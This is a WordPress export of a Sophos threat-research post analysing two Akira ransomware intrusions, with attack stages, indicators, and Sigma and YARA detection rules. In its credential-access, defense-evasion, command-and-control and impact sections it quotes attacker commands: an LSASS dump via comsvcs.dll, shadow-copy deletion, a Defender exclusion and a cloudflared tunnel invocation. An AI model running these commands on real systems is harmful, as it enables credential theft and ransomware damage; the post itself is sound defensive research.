{"id":21973,"date":"2023-05-11T09:46:25","date_gmt":"2023-05-11T17:46:25","guid":{"rendered":"https:\/\/www.palada.net\/index.php\/2023\/05\/11\/news-15704\/"},"modified":"2023-05-11T09:46:25","modified_gmt":"2023-05-11T17:46:25","slug":"news-15704","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2023\/05\/11\/news-15704\/","title":{"rendered":"Akira Ransomware is \u201cbringin\u2019 1988 back\u201d"},"content":{"rendered":"<p><strong>Credit to Author: gallagherseanm| Date: Tue, 09 May 2023 20:27:03 +0000<\/strong><\/p>\n<div class=\"entry-content lg:prose-lg mx-auto prose max-w-4xl\">\n<p>On April 6, 2023, the Sophos Incident Response team was engaged to support a ransomware victim organization in North America. The following week on April 12, 2023, yet another North American organization contacted Sophos for assistance.<\/p>\n<p>While the incidents appeared to be the work of two different criminal actors, both deployed a recently emerged ransomware called Akira. 
In both cases, the affected organizations had files encrypted with the \u201c.akira\u201d extension and had nearly identical ransom note files, named fn.txt, dropped in the process (as shown below in Figure 1).<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png\"><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-full wp-image-91586\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png\" alt=\"\" width=\"640\" height=\"346\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png 1426w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=300,162 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=768,415 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira1.png?resize=1024,553 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><\/p>\n<p><em>Figure 1: \u201cfn.txt\u201d ransomware notice<\/em><\/p>\n<p>This Akira ransomware bears no code similarity to a <a href=\"https:\/\/www.enigmasoftware.com\/akiraransomware-removal\/\">previous ransomware<\/a> strain with the same name that was active in 2017 and is likely unrelated. The new jQuery-based leak site (Figure 2), with its retro green colors, has garnered most of the attention, as it accepts commands instead of listing out information.<\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira2.png\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira2.png\" alt=\"Screenshot of Akira ransomware leak site.\" \/><\/a><\/p>\n<p><em>Figure 2a: Screenshot of the Akira ransomware leak site.<\/em><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira3.png\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/akira3.png\" alt=\"Screenshot of Akira leaks website.\" \/><\/a><\/p>\n<p><em>Figure 2b: A pop-up window from the Akira leak site.<\/em><\/p>\n<p>However, cool as their leak site design may be, none of this matters to the victims of this ransomware, which regrettably include a <a href=\"https:\/\/twitter.com\/AlvieriD\/status\/1651245999350792202\">daycare service in Canada<\/a>. While the total number of victim organizations (Figure 3) is still relatively small in comparison to LockBit or BlackCat\/ALPHV, that is how all new ransomware families begin.<\/p>\n<figure id=\"attachment_91591\" aria-describedby=\"caption-attachment-91591\" style=\"width: 640px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png\"><img decoding=\"async\" loading=\"lazy\" class=\"size-full wp-image-91591\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png\" alt=\"Bar chart showing number of ransomware leak postings per day over the past two weeks\" width=\"640\" height=\"360\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png 1200w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=300,169 300w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=768,432 768w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira-attacks.png?resize=1024,576 1024w\" sizes=\"auto, (max-width: 640px) 100vw, 640px\" \/><\/a><figcaption id=\"caption-attachment-91591\" class=\"wp-caption-text\">Figure 3: Timeline analysis of 
Akira victims<\/figcaption><\/figure>\n<p>In this blog post, we will compare two separate incident attack flows, illustrating how different threat actors are deploying Akira ransomware. Please note that available data on the second incident is limited, but we are highlighting deviations between the two incidents. This information will provide organizations with detailed guidance on what they need to defend against to protect their businesses.<\/p>\n<h2><strong>Attack Flow Details<\/strong><\/h2>\n<h2><strong>Initial Access<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>A user account purposely configured to allow for Multi-Factor Authentication (MFA) bypass.<\/p>\n<p>[T1078 \u2013 Valid Accounts] [T1133 \u2013 External Remote Services]<\/p>\n<ul>\n<li>External IP access from the threat actor was routed through European TOR VPN exit nodes.<\/li>\n<\/ul>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>VPN access using single-factor authentication.<\/p>\n<p>[T1078 \u2013 Valid Accounts] [T1133 \u2013 External Remote Services]<\/p>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Replacing password-only authentication with MFA remains one of the highest return-on-investment (ROI) security controls; however, special attention must be given to auditing for any accounts with bypass exceptions. 
Also, it\u2019s recommended that organizations block any inbound traffic from TOR networks where perimeter controls are available.<\/p>\n<h2><strong>Credential Access<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>Minidump of LSASS process memory leveraging comsvcs.dll with proxy execution by rundll32.exe.<\/p>\n<p>[T1003.001 &#8211; OS Credential Dumping: LSASS Memory] [T1569 &#8211; System Services]<\/p>\n<pre>Service Name: TcwvBcuf\nAction: %COMSPEC% \/Q \/c cmD.Exe \/Q \/c for \/f \"tokens=1,2 delims= \" ^%A in ('\"tasklist \/fi \"Imagename eq lsass.exe\" | find \"lsass\"\"') do rundll32.exe C:\\windows\\System32\\comsvcs.dll, #+0000^24 ^%B \\Windows\\Temp\\FP4.docx full<\/pre>\n<ul>\n<li>The use of a .docx extension is not as common as .dmp or .txt.<\/li>\n<li>The service name is a random eight-character string, and different strings were observed across different systems.<\/li>\n<\/ul>\n<p>Credential access activity also occurred over the network, as this Sophos endpoint detection indicates:<\/p>\n<pre>'Creds_4h (T1003.002)' malicious behaviour detected in 'C:\\Windows\\System32\\svchost.exe'<\/pre>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>While execution details are limited, multiple systems had the file <strong><em>C:\\Windows\\MEMORY.DMP<\/em><\/strong> created prior to ransomware execution, correlating with Windows event log data.<\/p>\n<p>[T1003.001 &#8211; OS Credential Dumping: LSASS Memory] [T1569 &#8211; System Services]<\/p>\n<pre>[4656 \/ 0x1230] Source Name: Microsoft-Windows-Security-Auditing Strings: ['S-1-5-18' '&lt;Redacted&gt;$' '&lt;Redacted&gt;' '0x00000000000003e7' 'Security' 'Process' '\\Device\\HarddiskVolume3\\Windows\\System32\\lsass.exe' '0x0000000000000524' '{00000000-0000-0000-0000-000000000000}' '%%4490 %%4492 ' '-' '0x00001400' '-' '0' '0x0000000000001318' 
'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe' '-']<\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Dumping process memory to obtain credentials is a pervasive technique observed in most ransomware incidents. Aside from ensuring full coverage of your endpoint agent, special care should be taken to segment domain admin accounts from workstation admin accounts to reduce the impact of credential dumping when it does occur. This is also a great candidate for a repeatable hunt, using a structured method to look for variations in the pre- and post-dumping activity that may have bypassed your existing detections. Listed below is a Sigma rule that can be used by defenders to detect or hunt on the credential access technique used above.<\/p>\n<pre>title: Using the Minidump function of comsvcs.dll\ndescription: 'The minidump function of comsvcs.dll can be used to dump lsass.exe. The function requires the PID of lsass.exe. In addition, the Minidump function can be called using #24 rather than its name.'\nauthor: Sophos MDR\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - \\sc.exe\n            - \\cmd.exe\n            - \\powershell.exe\n    command_line_filter:\n        CommandLine|re: '.*comsvcs.*(minidump|#24).*'\n    condition: selection and command_line_filter\nfalsepositives:\n    - Penetration testing\nlevel: high\ntags:\n    - attack.credential_access # TA0006\n    - attack.T1003.001<\/pre>\n<h2><strong>Discovery<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>Conducting discovery indirectly via scheduled tasks named \u201cWindows Update\u201d performing remote directory listings.<\/p>\n<p>[T1083 &#8211; File and Directory Discovery] [T1053.005 &#8211; Scheduled Task\/Job: Scheduled Task]<\/p>\n<pre>C:\\&gt;type c:\\programdata\\HP\\ms.bat\ndir \"\\\\10.1.100.64\\c$\\ProgramData\" &gt;&gt; C:\\programdata\\HP\\svr_dir.txtt<\/pre>\n<p>Leveraging a dual-use tool, PCHunter64, to acquire detailed process and system information.<\/p>\n<p>[T1082 &#8211; System Information Discovery] [T1105 &#8211; Ingress Tool Transfer]<\/p>\n<pre>URL: :2023040620230407: administrator@https:\/\/www.google[.]com\/url?esrc=s&amp;q=&amp;rct=j&amp;sa=U&amp;url=https:\/\/m.majorgeeks[.]com\/files\/details\/pc_hunter.html Access count: 1\nURL: Visited: administrator@hXXps:\/\/temp[.]sh\/PewtN\/PCHunter64.exe Access count: 9<\/pre>\n<ul>\n<li>The threat actor initially searched online for the tool before staging it for future downloads using a public cloud hosting service.<\/li>\n<\/ul>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Utilization of a dual-use tool, Advanced IP Scanner, to discover other systems and networks.<\/p>\n<p>[T1018 &#8211; Remote System 
Discovery]<\/p>\n<pre>Prefetch [ADVANCED_IP_SCANNER_2.5.4594.] was executed - run count 2 hash: 0xC2980947 volume: 1 [serial number: 0x22E2CC6E device path: VOLUME{01d89216e27acb2f-22e2cc6e}]<\/pre>\n<p>Employing an existing IT tool, LANSweeper, to access detailed network and system information.<\/p>\n<p>[T1018 &#8211; Remote System Discovery] [T1087 &#8211; Account Discovery: Domain Account]<\/p>\n<pre>Visited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdComputers.csv\nVisited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdSubnets.csv\nVisited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdOUs.csv\nVisited: &lt;redacted&gt;@file:\/\/\/C:\/ProgramData\/AdUsers.csv\nURL F[:]\/IT\/Backups\/Database\/LANSweeper%20SQL+Key\/Encryption.txt<\/pre>\n<ul>\n<li>The threat actor accessed the decryption key to facilitate gaining reconnaissance information without doing any noisy discovery scanning.<\/li>\n<\/ul>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Understanding the intention of a dual-use tool being executed is challenging; however, it\u2019s best practice to document which tools are approved for corporate use and block all others by default until they can be reviewed. This has the added benefit of reducing shadow IT risk as well. Additionally, just like high-value business data, access to both the tool and the output of vulnerability scanners and asset discovery applications should be restricted and audited. We have also included an example Sigma detection rule for the activity shown in incident #1.<\/p>\n<pre>title: Listing Directories of Remote Hosts\ndescription: Threat actors can use Windows binaries and commands to discover directories of interest to them on remote hosts and redirect the output to a file on disk for later consumption.\nauthor: Sophos MDR\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith:\n            - 'cmd.exe'\n            - 'powershell.exe'\n        CommandLine|contains:\n            - 'dir *\\\\*c$*&gt;&gt;'\n            - 'ls *\\\\*c$*&gt;&gt;'\n    filter:\n        ParentImage|endswith:\n            - 'java.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Possible from admin activity\nlevel: high\ntags:\n    - attack.discovery # TA0007\n    - attack.T1083<\/pre>\n<h2><strong>Lateral Movement<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>There were no network restrictions on Remote Desktop Protocol (RDP), and the threat actor was able to move freely across the network; as a result, this activity was captured by multiple event types.<\/p>\n<pre>Event ID [1149] - RDP connection established\nEvent ID [1149] RDP from IP: &lt;Redacted&gt;\nEvent ID: 25 - Remote Desktop Services: Session reconnection succeeded\nEvent ID: 24 - Remote Desktop Services: Session has been disconnected\nEvent ID [4624] RDP Type \"3\" from IP: &lt;Redacted&gt; - Device: &lt;Redacted&gt;\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\\&lt;Redacted&gt;] Username hint: &lt;Redacted&gt;\n&lt;Provider Name=\"Microsoft-Windows-RemoteDesktopServices-RdpCoreTS\" Guid=\"{1139C61B-B549-4251-8ED3-27250A1EDEC8}\" \/&gt;\n&lt;EventID&gt;131&lt;\/EventID&gt;\n&lt;Version&gt;0&lt;\/Version&gt;\n&lt;Level&gt;4&lt;\/Level&gt;\n&lt;Task&gt;4&lt;\/Task&gt;\n&lt;Opcode&gt;15&lt;\/Opcode&gt;\n&lt;Keywords&gt;0x4000000000000000&lt;\/Keywords&gt;\n&lt;TimeCreated SystemTime=\"2023-04-06T09:23:41.969586500Z\" \/&gt;\n&lt;EventRecordID&gt;633&lt;\/EventRecordID&gt;\n&lt;Correlation ActivityID=\"{F4208FE1-4D5D-45DF-B8E2-A851AC3F0000}\" \/&gt;\n&lt;Execution ProcessID=\"1136\" ThreadID=\"2228\" \/&gt;\n
&lt;Channel&gt;Microsoft-Windows-RemoteDesktopServices-RdpCoreTS\/Operational&lt;\/Channel&gt;\n&lt;Computer&gt;&lt;Redacted&gt;&lt;\/Computer&gt;\n&lt;Security UserID=\"S-1-5-20\" \/&gt;\n&lt;\/System&gt;\n&lt;EventData&gt;\n&lt;Data Name=\"ConnType\"&gt;TCP&lt;\/Data&gt;\n&lt;Data Name=\"ClientIP\"&gt;&lt;Redacted&gt;:56736&lt;\/Data&gt;\n&lt;\/EventData&gt;\n&lt;\/Event&gt;<\/pre>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Similar to Incident #1, the threat actor was able to RDP unencumbered across the organization&#8217;s infrastructure.<\/p>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Securing RDP access can be difficult for many companies, but it is a project worthy of investment. The first item to check off is restricting, by role, which accounts can access other systems using RDP. The overwhelming majority of users do not need this access. Secondly, adopting a centralized jump server, which only admins can access with MFA, and blocking other system-to-system RDP at the network level is a strong preventative control. Lastly, a detection should be in place to promptly review anomalous RDP connections and deconflict them with approved system administration activity.<\/p>\n<h2><strong>Defense Evasion<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>The threat actor executed two actions to bypass Windows Defender.<\/p>\n<p>[T1562.001 &#8211; Impair Defenses: Disable or Modify Tools]<\/p>\n<pre>5001 - Real-time Protection was disabled\nNew Value: HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\<\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>The first line of defense available to organizations is to use a security agent that has robust tamper protection. In terms of monitoring for this activity, these are detection-ready event sources. 
While it\u2019s possible a system administrator would make such exceptions during troubleshooting, given the risk of this activity, it&#8217;s something that should be investigated promptly if a corresponding support ticket isn\u2019t found.<\/p>\n<h2><strong>Command and Control<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>During this incident, the threat actor leveraged one of the most popular dual-use agents, <strong>AnyDesk<\/strong>, to provide persistent remote access into the affected organization on multiple systems.<\/p>\n<p>[T1219 &#8211; Remote Access Software]<\/p>\n<pre>UserAssist entry: 86 Value name: C:\\Users\\administrator.&lt;Redacted&gt;\\AppData\\Local\\Microsoft\\Windows\\INetCache\\IE\\14J9H2AA\\AnyDesk.exe Count: 1\nEvent ID [7045] \"Service Name: Anydesk\" \"C:\\Program Files (x86)\\AnyDesk\\AnyDesk.exe\" --service\nPrefetch [ANYDESK.EXE] was executed - run count 9 path: \\PROGRAM FILES (X86)\\ANYDESK\\ANYDESK.EXE hash: 0x389EE9E9 volume: 1 [serial number: 0x7077BC2C device path: VOLUME{01cf89bc76f2a351-7077bc2c}]<\/pre>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>The threat actor almost immediately installed Cloudflare\u2019s freely available tunnelling software as <strong><em>C:\\ProgramData\\windows_update.exe<\/em><\/strong>, followed by the download and execution of another dual-use agent, <strong>Radmin<\/strong>.<\/p>\n<p>[T1572 &#8211; Protocol Tunneling] [T1219 &#8211; Remote Access Software]<\/p>\n<pre>C:\\programdata\\windows_update.exe tunnel run --token eyJhIjoiODllZDkxZjgyNWE3ZGM3NGY4ZmRlMTc2MWY3ZDcwMWMiLCJ0IjoiMTUwMGIxMGEtZjM3My00ZmJlLTk4ZTYtODgwMDMxYzE1M2VkIiwicyI6IlpURmtZV0V6TUdFdFpETXlOeTAwT0dRNUxUazNaakF0T1RsbVpESmxabU0yWVRWaCJ9\nhxxps:\/\/download[.]radmin[.]com\/download\/files\/Radmin_3.5.2.1_EN[.]zip (Radmin_3.5.2.1_EN.zip)<\/pre>\n<ul>\n<li>A feature of Advanced IP Scanner is integration with Radmin to provide remote access to scanned 
systems.<\/li>\n<\/ul>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Just as with the discovery activity, threat actor usage of dual-use agents is both commonplace and important to disrupt. All non-approved remote access solutions should be blocked by default by an application control capability. Aside from allowing command and control (C2) and data exfiltration opportunities for an attacker, there is also a latent risk of the software itself having vulnerabilities and being unpatched because it&#8217;s not being managed by IT.<\/p>\n<h2><strong>Collection<\/strong><\/h2>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>A confirmed compromised account was used to download the WinRAR archiving software, and several files were staged for possible, but unconfirmed, exfiltration.<\/p>\n<p>[T1560.001 &#8211; Archive Collected Data: Archive via Utility]<\/p>\n<pre>URL Visited: hxxps:\/\/notifier.rarlab[.]com\/?language=English&amp;source=RARLAB&amp;landingpage=first&amp;version=621&amp;architecture=64\nUserassist 2023-03-15T10:15:55Z C:\\Users\\&lt;Redacted&gt;\\Downloads\\winrar.exe\nUserassist 2023-03-15T11:04:42Z C:\\ProgramData\\winrar.exe\nURL Visited: E:\/&lt;Redacted&gt;Dept.rar\nURL Visited: E:\/&lt;Redacted&gt;Channel.rar<\/pre>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>Often by the time a threat actor is staging data, it&#8217;s too late to have a good security outcome. A good approach to prevent theft of data is to adopt least privilege access, which means ensuring only the required people have access, followed by granular controls on exporting, sharing, or moving the files. 
DLP solutions, while having a history of being difficult to implement and maintain, are worth evaluating for high-risk data.<\/p>\n<h2><strong>Impact<\/strong><\/h2>\n<h3><strong>Incident #1<\/strong><\/h3>\n<p>The <strong><em>C:\\ProgramData\\Update.bat<\/em><\/strong> file executed the ransomware binary <strong><em>dllhost32.exe<\/em><\/strong>, which is detected as <strong>Troj\/Ransom-GWA<\/strong> by Sophos (Figure 4).<\/p>\n<p>[T1486 &#8211; Data Encrypted for Impact] [T1490 &#8211; Inhibit System Recovery]<\/p>\n<pre>dllhost32.exe -n=10 -s=C:\\ESD\\sharez.txt\ndllhost32.exe -n=1 -s=C:\\program files\\sharez.txt\npowershell.exe -Command \"Get-WmiObject Win32_Shadowcopy | Remove-WmiObject\"<\/pre>\n<ul>\n<li>The -n option sets the encryption percentage; the attacker used different settings during the incident.<\/li>\n<li>The -s option is short for --share_file; there is also a -p option for --encryption_path.<\/li>\n<li>Removing the shadow copies prevents recovery using native Windows features, and Sophos detects this as <strong>Impact_6a<\/strong>.<\/li>\n<li>Creates the <strong><em>C:\\fn.txt<\/em><\/strong> or <strong><em>C:\\etc\\fn.txt<\/em><\/strong> ransom note when complete.<\/li>\n<li>Dwell time of 7 days before executing ransomware.<\/li>\n<\/ul>\n<p>On endpoints protected with Sophos, the following detections triggered:<\/p>\n<pre>CryptoGuard detected ransomware in C:\\ProgramData\\dllhost32.exe\n'Cleanup_1a (T1486)' malicious behavior detected in 'C:\\ProgramData\\dllhost32.exe'<\/pre>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira5.jpg\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira5.jpg\" alt=\"\" \/><\/a><\/p>\n<p><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira6.png\"><img decoding=\"async\" loading=\"lazy\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira6.png\" alt=\"\" \/><\/a><\/p>\n<p><em>Figure 4: Sophos Central Attack Graph<\/em><\/p>\n<h3><strong>Incident #2<\/strong><\/h3>\n<p>Ransomware binary <strong><em>C:\\ProgramData\\hpupdate.exe<\/em><\/strong> is executed and detected as <strong>Troj\/Ransom-GWG<\/strong> by Sophos.<\/p>\n<p>[T1486 &#8211; Data Encrypted for Impact] [T1490 &#8211; Inhibit System Recovery]<\/p>\n<ul>\n<li>Creates the <strong><em>C:\\fn.txt<\/em><\/strong> ransom note when complete.<\/li>\n<li>Dwell time of 30+ days before executing ransomware.<\/li>\n<\/ul>\n<p>As previously reported by <a href=\"https:\/\/www.bleepingcomputer.com\/news\/security\/meet-akira-a-new-ransomware-operation-targeting-the-enterprise\/\">Bleeping Computer<\/a>, Akira targets 26 specific file extensions for encryption. These extensions are predominantly related to databases, but also include targeting of virtual memory and disk images. 
Notably, it does not target PDFs or typical Microsoft Office file types.<\/p>\n<p>SophosLabs researchers have also confirmed which file extensions are avoided by Akira in order not to impact system stability.<\/p>\n<figure id=\"attachment_91598\" aria-describedby=\"caption-attachment-91598\" style=\"width: 412px\" class=\"wp-caption alignnone\"><a href=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg\"><img decoding=\"async\" loading=\"lazy\" class=\"wp-image-91598 size-full\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg\" alt=\"\" width=\"412\" height=\"232\" srcset=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg 412w, https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/Akira7.jpg?resize=300,169 300w\" sizes=\"auto, (max-width: 412px) 100vw, 412px\" \/><\/a><figcaption id=\"caption-attachment-91598\" class=\"wp-caption-text\">Figure 5: File types excluded by Akira<\/figcaption><\/figure>\n<h3><strong>Guidance<\/strong><\/h3>\n<p>As mentioned earlier, at this late stage in the attack, having full coverage on all systems with a properly configured XDR solution is vital to protect organizations from ransomware. In the case of Sophos, it&#8217;s critical for customers to have their CryptoGuard policy activated, which is something support can guide customers on. 
We have also provided the YARA rule below, which can be used to identify Akira ransomware binaries.<\/p>\n<pre>rule ecrime_AKIRA_strings {\n    meta:\n        id = \"8c59c35d-8fb8-4644-9fa4-ce05b30e91c3\"\n        version = \"1.0\"\n        author = \"Paul Jaramillo\"\n        intrusion_set = \"AKIRA\"\n        description = \"Detects common strings\"\n        source = \"PE binaries\"\n        creation_date = \"2023-05-03\"\n        modification_date = \"2023-05-09\"\n        classification = \"TLP:CLEAR\"\n    strings:\n        $s1 = \".akira\" ascii nocase\n        $s2 = \"akira_readme.txt\" ascii nocase\n        $s3 = \".onion\" ascii nocase\n        $s4 = \/\\\\akira\\\\asio\\\\include\\\\asio\\\\impl\\\\co_spawn.hpp\/\n        $s5 = \/MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAylJbjtFvzHapC\/\n    condition:\n        (filesize &gt; 250KB and filesize &lt; 1MB) and\n        uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x4550 and\n        (($s1 and $s2 and $s3) or $s4 or $s5)\n}<\/pre>\n<p>Please be aware that threat actors will continue to modify the code, which was evident when we uncovered the following new file name being used: \u201c<strong>readme-asldkas.txt<\/strong>\u201d.<\/p>\n<h1><strong>Conclusion<\/strong><\/h1>\n<p>Sophos MDR is sharing this information with the specific goal of aiding defenders in the seemingly never-ending battle with ransomware threat groups. Through each of the covered steps in the attack flow, specific guidance is provided to drive actions with context. Aside from the differences in C2 tools used (AnyDesk vs Cloudflared), one of the key points to highlight is the dwell time. Incident #1 had a dwell time of 7 days compared to incident #2 with over 30 days of dwell time. Both of these events demonstrate a slower operational tempo, which bodes well for defenders having opportunities to disrupt in-flight compromises. 
The time from initial access to ransomware impact is indicative of the complex e-crime ecosystem, where there are distributors, initial access brokers, malware developers, and ransomware affiliates working together from resource development to payment. Unfortunately, there are some edge cases where organizations have had their files encrypted within just 24 hours, and that type of threat really does require an experienced, global partner, such as Sophos, to augment your security program.<\/p>\n<h4>Acknowledgements<\/h4>\n<p>Sophos would like to acknowledge the contributions of Melisa Kelly, Jason Jenkins, Anand Ajjan, Steeve Gaudreault, Kostas Tsialemis, and Sean Gallagher to this report.<\/p>\n<\/div>\n<p><a href=\"https:\/\/news.sophos.com\/en-us\/2023\/05\/09\/akira-ransomware-is-bringin-88-back\/\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/sophos\/dgdY<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/news.sophos.com\/wp-content\/uploads\/2023\/05\/shutterstock_2228563287-1.jpg\"\/><\/p>\n<p><strong>Credit to Author: gallagherseanm| Date: Tue, 09 May 2023 20:27:03 +0000<\/strong><\/p>\n<p>A new, recently observed ransomware family dubbed Akira uses a retro aesthetic on its victim site, very reminiscent of 1980s green-screen consoles, and possibly takes its name from the popular 1988 anime film of the same 
name.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10378,10377],"tags":[29351,129,12657,3765,24552,24815,16771],"class_list":["post-21973","post","type-post","status-publish","format-standard","hentry","category-security","category-sophos","tag-akira","tag-featured","tag-incident-response","tag-ransomware","tag-security-operations","tag-sophos-xdr","tag-threat-research"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21973","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=21973"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/21973\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=21973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=21973"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=21973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}